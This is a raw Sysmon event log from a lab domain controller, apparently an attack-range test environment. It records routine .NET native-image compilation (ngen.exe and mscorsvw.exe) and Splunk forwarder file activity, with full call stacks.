21:05:36.669{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A220-60D3-7604-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:45.466{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A229-60D3-8204-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.466{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A229-60D3-8204-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:45.388{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A229-60D3-8104-00000000CF01}6680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.357{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A229-60D3-8104-00000000CF01}6680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:45.357{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A229-60D3-8104-00000000CF01}6680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:45.263{4DB9351A-A229-60D3-8004-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\191c-0\System.Device.dll2021-06-23 21:05:45.263 10341000x800000000000000021617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:45.169{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A229-60D3-8004-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.138{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A229-60D3-8004-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:45.138{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A229-60D3-8004-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:45.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A229-60D3-7F04-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.044{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A229-60D3-7F04-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:45.044{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A229-60D3-7F04-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:46.919{4DB9351A-A22A-60D3-8604-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c38-0\System.Drawing.Design.dll2021-06-23 21:05:46.919 23542300x800000000000000021641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.778{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=639C76E410F96BCB7ACFE314A86B18C3,SHA256=773047EE17827F637B5976DA9C864A3DE36827703C243A3899FA423C0D437F3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.732{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22A-60D3-8604-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.701{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A22A-60D3-8604-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:46.701{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22A-60D3-8604-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:46.653{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22A-60D3-8504-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.606{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22A-60D3-8504-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:46.606{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22A-60D3-8504-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:46.513{4DB9351A-A22A-60D3-8404-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19fc-0\System.DirectoryServices.Protocols.dll2021-06-23 21:05:46.513 10341000x800000000000000021633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:46.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22A-60D3-8404-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.106{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=966A92FF873A9E36852D68993952F9E4,SHA256=7AA43CDB2C8C4286DDFC8ACA65BB2CD664DA870CFA47C99C023A66FAB140F482,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.106{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A22A-60D3-8404-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:46.106{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22A-60D3-8404-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:46.044{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22A-60D3-8304-00000000CF01}6808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 